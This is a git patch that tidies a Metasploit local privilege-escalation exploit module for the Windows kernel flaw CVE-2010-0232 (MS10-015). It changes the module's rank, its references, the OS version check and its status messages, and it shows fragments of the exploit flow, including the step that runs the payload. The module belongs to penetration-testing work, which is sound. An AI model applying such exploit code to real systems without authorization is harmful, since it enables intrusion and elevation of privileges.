From e4fc361b373bd41c99420f172d8ac4c906301580 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 13 Nov 2013 10:38:48 +1000
Subject: [PATCH] Various tidies and fixes

* Change ranking.
* Update references to comply with correct approach.
* Update messages to better describe what should happen.
* Update the Windows version regex to match XP.
* Update `check` function to use `unless`.

Thanks again @jvazquez-r7 for the feedback!
---
 .../exploits/windows/local/ms10_015_kitrap0d.rb  | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index 905da9d64d..e9372f1f27 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -8,10 +8,8 @@ require 'msf/core/exploit/exe'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
-  # TODO: ask Juan/Sinner/Wvu what this should be
-  Rank = ExcellentRanking
+  Rank = GreatRanking
 
-  include Exploit::EXE
   include Post::File
   include Post::Windows::Priv
 
@@ -45,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Local
       'References'    => [
         [ 'CVE', '2010-0232' ],
         [ 'OSVDB', '61854' ],
-        [ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ],
-        [ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/MS10-015' ],
-        [ 'URL', 'http://www.exploit-db.com/exploits/11199/' ]
+        [ 'MSB', 'MS10-015' ],
+        [ 'EDB', '11199' ],
+        [ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
       ],
       'DisclosureDate'=> "Jan 19 2010"
     ))
@@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     # Validate OS version
     winver = sysinfo["OS"]
-    if winver !~ /Windows 2000|Windows Vista|Windows 2003|Windows 2008|Windows 7/
+    unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
       return Exploit::CheckCode::Safe
     end
 
@@ -74,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Exploit::Failure::None, 'Session is already elevated')
     end
 
-    if check() == Exploit::CheckCode::Safe
+    if check == Exploit::CheckCode::Safe
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
     end
 
@@ -115,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
     print_status("Exploit executed. Executing payload...")
     # Finally run our payload
     host_process.thread.create(payload_mem, 0)
-    print_good("Exploit successful.")
+    print_good("Exploit finished, wait for a new (hopefully privileged) session.")
   end
 
 protected